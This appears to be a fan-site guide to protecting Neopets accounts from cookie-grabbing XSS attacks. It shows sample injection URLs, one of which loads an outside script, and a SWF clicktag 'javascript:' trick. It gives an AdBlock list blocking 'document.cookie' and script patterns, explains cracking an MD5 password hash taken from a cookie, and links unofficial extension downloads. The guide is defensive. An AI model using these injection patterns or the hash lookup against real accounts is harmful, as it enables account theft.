by NG Admin
in Neopets Guides
Comments Off on Neopets Cookie Grabber Protection!

Neopets Cookie Grabber Protection!

(For Firefox)

Cookie Grabbers!
Currently a load of people have one, a load more want one, and some of us don’t particularly want them to have our cookies.

If you don’t want to read the background information or babble and just want to install what’s needed, go right down to the bottom of this post. It’s in red.

If you want to know what a cookie grabber is then use google because you can find some pretty good explanations on it to be honest. Here’s just an explanation to somewhat defend against them.

There are two main ways people are grabbing cookies on neopets at the moment,

The Coding Error
This normally takes the form of
http://www.neopets.com/page.phtml?a=<script src=”http://a.com/lol.js”></script>

A page on neopets that allows custom code to be embedded onto the page, because of a coding error. The custom code embedded into the page is normally javascript which takes your cookies and sends them to a site to store them. These are normally either embedded in pages via iframes or you’re sent straight to them if the person is a bit dim and hasn’t heard of iframes.

The SWF clicktag
Basically a load of neopets.com flash files send you to another page when you click on them, and being who they are they have let the destination be set via the URL.

These normally take the form of
http://images.neopets.com/lovelyadvert.swf?clicktag=javascript:location.href =blahblah

And if you click the random swf you’ve been redirected to, the javascript is executed.
These can’t really be embedded in pages for new browsers, and IE7 doesn’t let them work properly if you’re directly sent to one.

Steps in stopping them ( I prefer options 3+4 together. )

1. Don’t go to any offsite links from neopets.
It’s true, but honestly I still go on a load of offsite links. And the thing is, anybody who knows you go on neopets can send you a link over msn with an embedded cookie grabber on. Being paranoid and logging out of neopets before you go to any other site, well I couldn’t be arsed with it.

2. Install NoScript for FireFox
https://addons.mozilla.org/en-US/firefox/addon/722
This again works but I normally end up turning NoScript off because the alerts annoy the hell out of me, having to enable every site I visit does get very tedious and it makes me just click yes to everything.

If you want to be in serious control of what scripts can run and which can’t then this is for you, but for most people it’s just extra unneeded micromanagement. Also although it has built in XSS (Cookie grabber’s use this technique) protection, it also interferes with a lot of stuff.

So this is good for blocking javascript all over the place, but you’ve got to get used to it.

3. My AdBlock list for FireFox to stop CookieGrabbers.
https://addons.mozilla.org/en-US/firefox/addon/1865
If you don’t have AdBlock, then basically it blocks all the adverts in the internet (Yay!) and what not. If you love adverts, you can opt to install but when it asks you to subscribe to a list just say no and cancel.

This is pretty painless in terms of affecting your browsing, You need to save this list, and import it into AdBlock.
http://www.mediafire.com/?jxsmixfx2uj

This list basically blocks most embedded offsite cookie grabbers, it filters out the most common bitties in a cookie grabber that is purely in the URL with the “document.cookie” and “javascript:”. And it stops any embedded pages from neopets having an opening tag in the URL, which is never used anyway by neopets. You can still send open code tags when editing lookups because that’s a direct request, so yeah.

What’s inside the txt file :

Code:

(Adblock Plus 0.6.1 or higher required) [Adblock]
*neopets*%3C*
*neopets*<*
*neopets.com*document.cookie*
*neopets.com*javascript:*
*neopets.com*script*

4. XSS guardian
As mentioned in the explanation there are some Flash(.SWF) based cookie grabbers, and some other ones where you’re directly sent to the page. Adblock won’t stop this because it’s a direct request, so here we have another extension!

This basically does the same thing as adblock but on direct URLS, it’ll scan the URL for common XSS vulnerabilities.

This pops up when it’s blocked something:

There are a few download URL’s for this one.

1. Original URL from firefox addons uploaded since it’s currently in the sandbox testing area on mozilla.org
http://www.mediafire.com/?21341zgxgyq

2. Edited to work with FireFox 3
http://www.mediafire.com/?m19fm0u0pne

3. Edited to work with FireFox 3 and not add another stupid icon to your statusbar (You’ll have to enable and disable it in the addons sections of firefox)
http://www.mediafire.com/?zw3nyycmmz0

These XPI files will download to your default download location, and then you have to drag them into an open firefox window.

Don’t become apathetic, these aren’t foolproof and if you still get CG’d don’t come to beat me up

COOKIE GRABBED AND DIDN’T REALISE? OH NOES.

There are plenty of guides on neopets.com about immediate action, if you think you’ve been CG’d change your password pretty quickly.

If these measures didn’t protect you and you got cookie grabbed, then this is what the person who’s got your cookie is going to do.

1. Use your cookies and neopets.com thinks they’re you, so they basically are logged into your account. However they don’t know your password or PIN number, so they can’t change the email or preferences. And if you PIN everything you should be fine.

2. Try and decrypt your cookies

Sadly Neopets have decided that security isn’t needed and have used a simple md5 hash on your password and stored it in your cookies.

There’s a nice part of the cookie that looks like
toolbar=USERNAME%2BB%2B151a30458b3336820a0f1408a59c3732
The bit in red, is an md5 hash of your password 😮

They can slap it in http://gdataonline.com/seekhash.php and try and decrypt it.
You know how you beat this?

Use basic password rules,use a long word as your password or use multiple numbers + punctuation marks.

If your password is “golf123” make your password “golf123golf123” it’ll make the hashed value very different, and long passwords won’t be on the databases websites like that one mentioned.

And although that was long, hopefully it was informative.
If it was just annoyingly long, say because I might write a couple more guides and I don’t want to be a bore.
Love CyberShot.

——-Short and sweet—-

Adblock Filter list:
If you don’t have AdBlock install it here, it’s an advert blocking FireFox Addon https://addons.mozilla.org/en-US/firefox/addon/1865
Import following txt file into Adblock via (Tools -> preferences -> import list)
http://www.mediafire.com/?jxsmixfx2uj

XSS Guardian:
Another FireFox extension,
Original Install File : http://www.mediafire.com/?21341zgxgyq
FireFox 3 compatible Install File : http://www.mediafire.com/?m19fm0u0pne
Firefox 3 compatible without Status Bar Image File : http://www.mediafire.com/?zw3nyycmmz0
Filters out direct cookie grabbers.
!!!!:These XPI files will download to your default download location, and then you have to drag them into an open firefox window.

Don’t go to offsite websiteswhen logged in on neopets:
A bit restricting.

Follow good passswords rules:

« Guide to Typing Terror!

Petpet Cooking Pot Recipes! »

Neopets Cookie Grabber Protection!

Buy Neopoints!